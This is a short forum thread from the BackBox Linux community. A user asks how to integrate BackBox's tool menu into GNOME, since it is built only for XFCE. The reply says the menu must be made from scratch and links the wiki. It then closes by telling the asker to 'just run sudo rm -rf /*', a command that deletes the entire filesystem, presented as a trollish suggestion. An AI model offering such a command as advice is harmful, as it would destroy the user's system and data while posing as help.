Different Desktop Envirnoments in BackBox

Started by xerohyp, October 09, 2017, 03:19:20 PM

Previous topic - Next topic

xerohyp

Hi there,
For starters, a huge thanks to the BackBox dev team. Backbox 5 is a huge improvement and as a information security enthusiast, i really appreciate the effort and time put into making a stable pentesting Distro. I have had many stability issues with parrotsec and kali linux. I am a very satisfied pentester with the release of BackBox! Thanks!

However, I did notice that there are no multiple Desktop environments supported by Backbox. By this, I imply that BackBox is not released in different flavours of DEs. I am aware that one can download and install a DE on their own, however, installing DE in such a way breaks the menu provided by the dev team.
Dont get me wrong, I love the minimilistic and performance approach used by XFCE, but in the linux world, everyone has their own preference of DE. I love xfce and Gnome.
The backbox menu does not exist in the GNOME DE. I was wondering if there is any way to integrate the backbox menu for other desktop environment like GNOME.
If not, any insights into the tool/software to create such a menu for gnome or cross supported DE menus will be greatly appreciated.

Thanks,

ZEROF

Hi,

You will need to make gnome menu from scratch, bbox is only integrated 100% with xfce ;).

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*